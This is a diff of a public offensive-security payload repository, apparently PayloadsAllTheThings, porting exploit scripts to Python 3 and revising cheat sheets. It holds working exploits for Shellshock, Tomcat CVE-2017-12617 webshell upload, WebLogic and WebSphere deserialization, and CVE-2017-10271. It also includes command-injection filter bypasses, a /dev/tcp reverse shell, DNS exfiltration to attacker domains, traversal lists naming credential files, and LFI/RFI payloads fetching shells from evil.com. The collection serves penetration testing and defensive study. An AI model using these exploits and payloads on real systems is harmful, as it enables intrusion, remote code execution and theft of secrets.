 from future import standard_library
 standard_library.install_aliases()
 from builtins import input
 import sys, urllib.request, urllib.error, urllib.parse
 if len(sys.argv) != 2:
-        print "Usage: shell_shocker <URL>"
+        print("Usage: shell_shocker <URL>")
        sys.exit(0)
 URL=sys.argv[1]
-print "[+] Attempting Shell_Shock - Make sure to type full path"
+print("[+] Attempting Shell_Shock - Make sure to type full path")
 while True:
-        command=raw_input("~$ ")
+        command=input("~$ ")
-        opener=urllib2.build_opener()
+        opener=urllib.request.build_opener()
        opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
        try:
                response=opener.open(URL)
                for line in response.readlines():
-                        print line.strip()
+                        print(line.strip())
-        except Exception as e: print e
+        except Exception as e: print(e)
--- a/CVE-2017-12617.py
+++ b/CVE-2017-12617.py
@@ -22,6 +22,10 @@ options:
 ./cve-2017-12617.py -l hotsts.txt
 ./cve-2017-12617.py --list hosts.txt
 """
 from __future__ import print_function
 from builtins import input
 from builtins import str
 from builtins import object
 import requests
 import re
 import signal
@@ -34,7 +38,7 @@ from optparse import OptionParser
-class bcolors:
+class bcolors(object):
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
@@ -79,9 +83,9 @@ signal.signal(signal.SIGINT, signal_handler)
 def removetags(tags):
-  remove = re.compile('<.*?>')
+    remove = re.compile('<.*?>')
-  txt = re.sub(remove, '\n', tags)
+    txt = re.sub(remove, '\n', tags)
-  return txt.replace("\n\n\n","\n")
+    return txt.replace("\n\n\n","\n")
 def getContent(url,f):
@@ -94,7 +98,7 @@ def createPayload(url,f):
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
    if req.status_code==201:
-        print "File Created .."
+        print("File Created ..")
 def RCE(url,f):
@@ -130,15 +134,15 @@ def shell(url,f):
    while True:
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-        cmd=raw_input("$ ")
+        cmd=input("$ ")
        payload={'cmd':cmd}
        if cmd=="q" or cmd=="Q":
-                break
+            break
        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
        re=str(re.content)
        t=removetags(re)
-        print t
+        print(t)
@@ -201,47 +205,35 @@ if opt.U==None and opt.P==None and opt.L==None:
 else:
    if opt.U!=None and opt.P==None and opt.L==None:
-        print bcolors.OKGREEN+banner+bcolors.ENDC 
+        print(bcolors.OKGREEN+banner+bcolors.ENDC)
-    	url=str(opt.U)
+        url=str(opt.U)
-    	checker="Poc.jsp"
+        checker="Poc.jsp"
-    	print bcolors.BOLD +"Poc Filename  {}".format(checker)
+        print(bcolors.BOLD +"Poc Filename  {}".format(checker))
-    	createPayload(str(url)+"/",checker)
+        createPayload(str(url)+"/",checker)
-    	con=getContent(str(url)+"/",checker)
+        con=getContent(str(url)+"/",checker)
-    	if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+        if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-    		print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
+            print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
-		print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
+            print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
-	else:
+        else:
-            print 'Not Vulnerable to CVE-2017-12617 '
+            print('Not Vulnerable to CVE-2017-12617 ')
    elif opt.P!=None and opt.U!=None and  opt.L==None:
-                print bcolors.OKGREEN+banner+bcolors.ENDC 
+        print(bcolors.OKGREEN+banner+bcolors.ENDC)
-		pwn=str(opt.P)
+        pwn=str(opt.P)
-		url=str(opt.U)
+        url=str(opt.U)
-		print "Uploading Webshell ....."
+        print("Uploading Webshell .....")
-		pwn=pwn+".jsp"
+        pwn=pwn+".jsp"
-		RCE(str(url)+"/",pwn)
+        RCE(str(url)+"/",pwn)
-		shell(str(url),pwn)
+        shell(str(url),pwn)
    elif opt.L!=None and opt.P==None and opt.U==None:
-                print bcolors.OKGREEN+banner+bcolors.ENDC 
+        print(bcolors.OKGREEN+banner+bcolors.ENDC)
-		w=str(opt.L)
+        w=str(opt.L)
-		f=open(w,"r")
+        f=open(w,"r")
-		print "Scaning hosts in {}".format(w)
+        print("Scaning hosts in {}".format(w))
-		checker="Poc.jsp"
+        checker="Poc.jsp"
-		for i in f.readlines():
+        for i in f.readlines():
-			i=i.strip("\n")
+            i=i.strip("\n")
-			createPayload(str(i)+"/",checker)
+            createPayload(str(i)+"/",checker)
-			con=getContent(str(i)+"/",checker)
+            con=getContent(str(i)+"/",checker)
-			if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-				print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
+                print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
--- a/Exploits/WebLogic
+++ b/Exploits/WebLogic
@@ -4,6 +4,7 @@
 #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
 #Made with <3 by @byt3bl33d3r
 from __future__ import print_function
 import socket
 import struct
 import argparse
@@ -34,29 +35,29 @@ else:
        ysoserial_path = args.ysoserial_path
 if len(args.target.split(':')) != 2:
-    print '[-] Target must be in format IP:PORT'
+    print('[-] Target must be in format IP:PORT')
    sys.exit(1)
 if not args.command:
-    print '[-] You must specify a command to run'
+    print('[-] You must specify a command to run')
    sys.exit(1)
 ip, port = args.target.split(':')
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-print '[*] Target IP: {}'.format(ip)
+print('[*] Target IP: {}'.format(ip))
-print '[*] Target PORT: {}'.format(port)
+print('[*] Target PORT: {}'.format(port))
 sock.connect((ip, int(port)))
 # Send headers
 headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
-print '[*] Sending header'
+print('[*] Sending header')
 sock.sendall(headers)
 data = sock.recv(1024)
-print'[*] Received: "{}"'.format(data)
+print('[*] Received: "{}"'.format(data))
 payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
@@ -67,5 +68,5 @@ payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f
 # adjust header for appropriate message length
 payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
-print '[*] Sending payload'
+print('[*] Sending payload')
 sock.send(payload)
--- a/CVE-2017-10271.py
+++ b/CVE-2017-10271.py
@@ -1,3 +1,5 @@
 from __future__ import print_function
 from builtins import input
 import requests
 import sys
@@ -44,18 +46,18 @@ def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
    if result.status_code == 500:
-        print "Command Executed \n"
+        print("Command Executed \n")
    else:
-        print "Something Went Wrong \n"
+        print("Something Went Wrong \n")
-print "***************************************************** \n" \
+print("***************************************************** \n" \
       "****************   Coded By 1337g  ****************** \n" \
       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
-       "***************************************************** \n"
+       "***************************************************** \n")
 while 1:
-    command_in = raw_input("Eneter your command here: ")
+    command_in = input("Eneter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)
--- a/Exploits/WebLogic
+++ b/Exploits/WebLogic
@@ -2,6 +2,8 @@
 # coding:utf-8
 # Build By LandGrey
 from __future__ import print_function
 from builtins import str
 import re
 import sys
 import time
--- a/Exploits/WebSphere
+++ b/Exploits/WebSphere
@@ -4,6 +4,8 @@
 #Based on the nessus plugin websphere_java_serialize.nasl
 #Made with <3 by @byt3bl33d3r
 from __future__ import print_function
 from builtins import chr
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@@ -34,7 +36,7 @@ if not args.command:
 elif args.command:
    if len(args.command) > 254:
-        print '[-] Command must be less then 255 bytes'
+        print('[-] Command must be less then 255 bytes')
        sys.exit(1)
 ip, port = args.target.split(':')
@@ -75,4 +77,4 @@ headers = {'Content-Type': 'text/xml; charset=utf-8',
           'SOAPAction': 'urn:AdminService'}
 r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False)
-print '[*] HTTPS request sent successfully'
+print('[*] HTTPS request sent successfully')
--- a/execution/Intruders/command-execution-unix.txt
+++ b/execution/Intruders/command-execution-unix.txt
--- a/execution/Intruders/command_exec.txt
+++ b/execution/Intruders/command_exec.txt
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -1,11 +1,40 @@
-# Remote Commands Execution
+# Command Injection
-Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
+> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
-NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
+
 ## Summary
 * [Tools](#tools)
 * [Exploits](#exploits)
  * [Basic commands](#basic-commands)
  * [Chaining commands](#chaining-commands)
  * [Inside a command](#inside-a-command)
 * [Filter Bypasses](#filter-bypasses)
  * [Bypass without space](#bypass-without-space)
  * [Bypass with a line return](#bypass-with-a-line-return)
  * [Bypass blacklisted words](#bypass-blacklisted-words)
   * [Bypass with single quote](#bypass-with-a-single-quote)
   * [Bypass with double quote](#bypass-with-a-double-quote)
   * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
   * [Bypass with $@](#bypass-with-----)
   * [Bypass with variable expansion](#bypass-with-variable-expansion)
   * [Bypass with wildcards](#bypass-with-wildcards)
 * [Challenge](#challenge)
 * [Time based data exfiltration](#time-based-data-exfiltration)
 * [DNS based data exfiltration](#dns-based-data-exfiltration)
 * [Polyglot command injection](#polyglot-command-injection)
 * [References](#references)
 ## Tools
 * [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix)
 ## Exploits
-Normal Commands execution, execute the command and voila :p
+### Basic commands
 Execute the command and voila :p
 ```powershell
 cat /etc/passwd
@@ -15,7 +44,7 @@ bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 ```
-Commands execution by chaining commands
+### Chaining commands
 ```powershell
 original_cmd_by_server; ls
@@ -24,14 +53,18 @@ original_cmd_by_server | ls
 original_cmd_by_server || ls    Only if the first cmd fail
 ```
-Commands execution inside a command
+### Inside a command
-```powershell
+```bash
 original_cmd_by_server `cat /etc/passwd`
 original_cmd_by_server $(cat /etc/passwd)
 ```
-Commands execution without space - Linux
+## Filter Bypasses
 ### Bypass without space
 Works on Linux only.
 ```powershell
 swissky@crashlab:~/Www$ cat</etc/passwd
@@ -56,51 +89,57 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
 swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 Commands execution without space - Windows
 ```powershell
 ping%CommonProgramFiles:~10,-18%IP
 ping%PROGRAMFILES:~10,-5%IP
 ```
 Commands execution without spaces, $ or { } - Linux (Bash only)
 ```powershell
 IFS=,;`cat<<<uname,-a`
 ```
-Commands execution with a line return
+Works on Windows only.
 ```powershell
 ping%CommonProgramFiles:~10,-18%IP
 ping%PROGRAMFILES:~10,-5%IP
 ```
 ### Bypass with a line return
 ```powershell
 something%0Acat%20/etc/passwd
 ```
-Bypass blacklisted word with single quote
+### Bypass Blacklisted words
 #### Bypass with single quote
 ```powershell
 w'h'o'am'i
 ```
-Bypass blacklisted word with double quote
+#### Bypass with double quote
 ```powershell
 w"h"o"am"i
 ```
-Bypass blacklisted word with backslash and slash
+#### Bypass with backslash and slash
 ```powershell
 w\ho\am\i
 /\b\i\n/////s\h
 ```
-Bypass blacklisted word with $@
+#### Bypass with $@
 ```powershell
 who$@ami
 echo $0
 -> /usr/bin/zsh
 echo whoami|$0
 ```
-Bypass blacklisted word with variable expansion
+#### Bypass with variable expansion
 ```powershell
 /???/??t /???/p??s??
@@ -110,12 +149,11 @@ cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
 ```
-Bypass zsh/bash/sh blacklist
+#### Bypass with wildcards
 ```powershell
-echo $0
+powershell C:\*\*2\n??e*d.*? # notepad
-> /usr/bin/zsh
+@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
 echo whoami|$0
 ```
 ## Challenge
@@ -149,10 +187,39 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
 ```powershell
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
-for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
+for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
-## Thanks to
+```powershell
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
 Online tools to check for DNS based data exfiltration:
 - dnsbin.zhack.ca
 - pingb.in
 ## Polyglot command injection
 ```bash
 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 e.g:
 echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 ```
 ```bash
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 e.g:
 echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
 echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
 ```
 ## References
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
 * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
--- a/Traversal/Intruder/deep_traversal.txt
+++ b/Traversal/Intruder/deep_traversal.txt
--- a/Traversal/Intruder/directory_traversal.txt
+++ b/Traversal/Intruder/directory_traversal.txt
--- a/Traversal/Intruder/dotdotpwn.txt
+++ b/Traversal/Intruder/dotdotpwn.txt
--- a/Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
+++ b/Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
--- a/Traversal/README.md
+++ b/Traversal/README.md
@@ -0,0 +1,156 @@
 # Directory traversal
 > A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
 ## Summary
 * [Tools](#tools)
 * [Basic exploitation](#basic-exploitation)
    * [16 bits Unicode encoding](#)
    * [UTF-8 Unicode encoding](#)
    * [Bypass "../" replaced by ""](#)
    * [Double URL encoding](#)
    * [UNC Bypass](#unc-bypass)
 * [Path Traversal](#path-traversal)
    * [Interesting Linux files](#)
    * [Interesting Windows files](#)
 ## Tools
 - [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn)
    ```powershell
    git clone https://github.com/wireghoul/dotdotpwn
    perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
    ```
 ## Basic exploitation
 We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
 ```powershell
 ../
 ..\
 ..\/
 %2e%2e%2f
 %252e%252e%252f
 %c0%ae%c0%ae%c0%af
 %uff0e%uff0e%u2215
 %uff0e%uff0e%u2216
 ```
 ### 16 bits Unicode encoding
 ```powershell
 . = %u002e
 / = %u2215
 \ = %u2216
 ```
 ### UTF-8 Unicode encoding
 ```powershell
 . = %c0%2e, %e0%40%ae, %c0ae
 / = %c0%af, %e0%80%af, %c0%2f
 \ = %c0%5c, %c0%80%5c
 ```
 ### Bypass "../" replaced by ""
 Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
 ```powershell
 ..././
 ...\.\
 ```
 ### Double URL encoding
 ```powershell
 . = %252e
 / = %252f
 \ = %255c
 ```
 ### UNC Bypass
 An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
 ```powershell
 \\localhost\c$\windows\win.ini
 ```
 ## Path Traversal
 ### Interesting Linux files
 ```powershell
 /etc/issue
 /etc/passwd
 /etc/shadow
 /etc/group
 /etc/hosts
 /etc/motd
 /etc/mysql/my.cnf
 /proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
 /proc/self/environ
 /proc/version
 /proc/cmdline
 /proc/sched_debug
 /proc/mounts
 /proc/net/arp
 /proc/net/route
 /proc/net/tcp
 /proc/net/udp
 /proc/self/cwd/index.php
 /proc/self/cwd/main.py
 /home/$USER/.bash_history
 /home/$USER/.ssh/id_rsa
 /var/run/secrets/kubernetes.io/serviceaccount
 ```
 ### Interesting Windows files
 Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 ```powershell
 c:/boot.ini
 c:/inetpub/logs/logfiles
 c:/inetpub/wwwroot/global.asa
 c:/inetpub/wwwroot/index.asp
 c:/inetpub/wwwroot/web.config
 c:/sysprep.inf
 c:/sysprep.xml
 c:/sysprep/sysprep.inf
 c:/sysprep/sysprep.xml
 c:/system32/inetsrv/metabase.xml
 c:/sysprep.inf
 c:/sysprep.xml
 c:/sysprep/sysprep.inf
 c:/sysprep/sysprep.xml
 c:/system volume information/wpsettings.dat
 c:/system32/inetsrv/metabase.xml
 c:/unattend.txt
 c:/unattend.xml
 c:/unattended.txt
 c:/unattended.xml
 ```
 The following log files are controllable and can be included with an evil payload to achieve a command execution
 ```powershell
 /var/log/apache/access.log
 /var/log/apache/error.log
 /var/log/httpd/error_log
 /usr/local/apache/log/error_log
 /usr/local/apache2/log/error_log
 /var/log/nginx/access.log
 /var/log/nginx/error.log
 /var/log/vsftpd.log
 /var/log/sshd.log
 /var/log/mail
 ```
 ## References
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
--- a/Inclusion/Intruders/BSD-files.txt
+++ b/Inclusion/Intruders/BSD-files.txt
--- a/Inclusion/Intruders/JHADDIX_LFI.txt
+++ b/Inclusion/Intruders/JHADDIX_LFI.txt
@@ -666,6 +666,18 @@ users/.htpasswd
 /var/log/news/news.notice
 /var/log/news/suck.err
 /var/log/news/suck.notice
 /var/log/nginx/access_log
 /var/log/nginx/access.log
 ../../../../../../../var/log/nginx/access_log
 ../../../../../../../var/log/nginx/access.log
 ../../../../../var/log/nginx/access_log
 ../../../../../var/log/nginx/access.log
 /var/log/nginx/error_log
 /var/log/nginx/error.log
 ../../../../../../../var/log/nginx/error_log
 ../../../../../../../var/log/nginx/error.log
 ../../../../../var/log/nginx/error_log
 ../../../../../var/log/nginx/error.log
 /var/log/poplog
 /var/log/POPlog
 /var/log/proftpd
--- a/Inclusion/Intruders/LFI-FD-check.txt
+++ b/Inclusion/Intruders/LFI-FD-check.txt
--- a/Inclusion/Intruders/LFI-WindowsFileCheck.txt
+++ b/Inclusion/Intruders/LFI-WindowsFileCheck.txt
--- a/Inclusion/Intruders/Linux-files.txt
+++ b/Inclusion/Intruders/Linux-files.txt
@@ -56,3 +56,7 @@
 /var/log/apache/error_log
 /var/log/httpd/error_log
 /var/log/httpd/access_log
 /var/log/nginx/access_log
 /var/log/nginx/access.log
 /var/log/nginx/error_log
 /var/log/nginx/error.log
--- a/Inclusion/Intruders/List_Of_File_To_Include.txt
+++ b/Inclusion/Intruders/List_Of_File_To_Include.txt
@@ -765,6 +765,20 @@ php://input
 /var/log/mysql/mysql-slow.log
 /var/log/mysql/mysql-slow.log
 /var/log/mysql/mysql-slow.log%00
 /var/log/nginx/access_log
 /var/log/nginx/access_log 
 /var/log/nginx/access_log
 /var/log/nginx/access.log
 /var/log/nginx/access.log 
 /var/log/nginx/access_log%00
 /var/log/nginx/access.log%00
 /var/log/nginx/error_log
 /var/log/nginx/error_log 
 /var/log/nginx/error.log
 /var/log/nginx/error.log 
 /var/log/nginx/error.log
 /var/log/nginx/error_log%00
 /var/log/nginx/error.log%00
 /var/log/proftpd
 /var/log/proftpd
 /var/log/proftpd%00
--- a/Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt
+++ b/Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt
@@ -41,6 +41,10 @@
 /var/log/httpd/error_log%00
 /var/log/httpd/access_log%00
 /var/log/httpd/error_log%00
 /var/log/nginx/access_log%00
 /var/log/nginx/access.log%00
 /var/log/nginx/error_log%00
 /var/log/nginx/error.log%00
 /apache/logs/error.log%00
 /apache/logs/access.log%00
 /apache/logs/error.log%00
--- a/Inclusion/Intruders/Logs-files.txt
+++ b/Inclusion/Intruders/Logs-files.txt
--- a/Inclusion/Intruders/Mac-files.txt
+++ b/Inclusion/Intruders/Mac-files.txt
@@ -4,3 +4,5 @@
 /var/log/apache2/error_log
 /var/log/apache2/access_log
 /usr/local/nginx/conf/nginx.conf
 /var/log/nginx/error_log
 /var/log/nginx/access_log
--- a/Inclusion/Intruders/Traversal.txt
+++ b/Inclusion/Intruders/Traversal.txt
--- a/Inclusion/Intruders/Web-files.txt
+++ b/Inclusion/Intruders/Web-files.txt
@@ -11,3 +11,4 @@ wp-admin.php
 /inc/mysql.php
 /sites/defaults/settings.php
 /phpmyadmin/changelog.php
 web.config
--- a/Inclusion/Intruders/Windows-files.txt
+++ b/Inclusion/Intruders/Windows-files.txt
--- a/Inclusion/Intruders/dot-slash-PathTraversal_and_LFI_pairing.txt
+++ b/Inclusion/Intruders/dot-slash-PathTraversal_and_LFI_pairing.txt
--- a/Inclusion/Intruders/simple-check.txt
+++ b/Inclusion/Intruders/simple-check.txt
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@@ -1,13 +1,21 @@
-# Local/Remote File Inclusion
+# File Inclusion
-The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
+> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
 ## Summary
 * [Tools](#tools)
 * [Basic LFI](#basic-lfi)
    * [Null byte](#null-byte)
    * [Double encoding](#double-encoding)
    * [UTF-8 encoding](#utf-8-encoding)
    * [Path and dot truncation](#path-and-dot-truncation)
    * [Filter bypass tricks](#filter-bypass-tricks)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
-  * [Wrapper php://filter](l#wrapper-phpfilter)
+  * [Wrapper php://filter](#wrapper-phpfilter)
  * [Wrapper zip://](#wrapper-zip)
  * [Wrapper data://](#wrapper-data)
  * [Wrapper expect://](#wrapper-expect)
@@ -20,94 +28,56 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
 * [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files)
-Linux - Interesting files to check out :
+## Tools
-```powershell
+* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
-/etc/issue
+* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
-/etc/passwd
+* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
 /etc/shadow
 /etc/group
 /etc/hosts
 /etc/motd
 /etc/mysql/my.cnf
 /proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
 /proc/self/environ
 /proc/version
 /proc/cmdline
 /proc/sched_debug
 /proc/mounts
 /proc/net/arp
 /proc/net/route
 /proc/net/tcp
 /proc/net/udp
 ```
 Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 ```powershell
 c:/boot.ini
 c:/inetpub/logs/logfiles
 c:/inetpub/wwwroot/global.asa
 c:/inetpub/wwwroot/index.asp
 c:/inetpub/wwwroot/web.config
 c:/sysprep.inf
 c:/sysprep.xml
 c:/sysprep/sysprep.inf
 c:/sysprep/sysprep.xml
 c:/system32/inetsrv/metabase.xml
 c:/sysprep.inf
 c:/sysprep.xml
 c:/sysprep/sysprep.inf
 c:/sysprep/sysprep.xml
 c:/system volume information/wpsettings.dat
 c:/system32/inetsrv/metabase.xml
 c:/unattend.txt
 c:/unattend.xml
 c:/unattended.txt
 c:/unattended.xml
 ```
 The following log files are controllable and can be included with an evil payload to achieve a command execution
 ```powershell
 /var/log/apache/access.log
 /var/log/apache/error.log
 /var/log/httpd/error_log
 /usr/local/apache/log/error_log
 /usr/local/apache2/log/error_log
 /var/log/vsftpd.log
 /var/log/sshd.log
 /var/log/mail
 ```
 ## Basic LFI
 In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd
 ```
-Null byte
+### Null byte
 :warning: In versions of PHP below 5.3 we can terminate with null byte.
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
-Double encoding
+### Double encoding
 ```powershell
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
-Path truncation
+### UTF-8 encoding
 ```powershell
-http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
+http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
-http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
 ```
-Filter bypass tricks
+### Path and dot truncation
 On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
 http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
 http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
 http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
 ```
 ### Filter bypass tricks
 ```powershell
 http://example.com/index.php?page=....//....//etc/passwd
@@ -117,22 +87,33 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
 ## Basic RFI
 Most of the filter bypasses from LFI section can be reused for RFI.
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt
 ```
-Null byte
+### Null byte
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt%00
 ```
-Double encoding
+### Double encoding
 ```powershell
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 ```
 ### Bypass allow_url_include
 When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
 1. Create a share open to everyone
 2. Write a PHP code inside a file : `shell.php`
 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
 ## LFI / RFI using wrappers
 ### Wrapper php://filter
@@ -151,7 +132,12 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
-NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
 ```powershell
 ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 
 curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
 ```
 ### Wrapper zip://
@@ -182,11 +168,16 @@ http://example.com/index.php?page=expect://ls
 ### Wrapper input://
-Specify your payload in the POST parameters
+Specify your payload in the POST parameters, this can be done with a simple `curl` command.
 ```powershell
-http://example.com/index.php?page=php://input
+curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v
-POST DATA: <? system('id'); ?>
+```
 Alternatively, Kadimus has a module to automate this attack.
 ```powershell
 ./kadimus -u "https://example.com/index.php?page=php://input%00"  -C '<?php echo shell_exec("id"); ?>' -T input
 ```
 ### Wrapper phar://
@@ -290,6 +281,8 @@ Just append your PHP code into the log file by doing a request to the service (A
 ```powershell
 http://example.com/index.php?page=/var/log/apache/access.log
 http://example.com/index.php?page=/var/log/apache/error.log
 http://example.com/index.php?page=/var/log/nginx/access.log
 http://example.com/index.php?page=/var/log/nginx/error.log
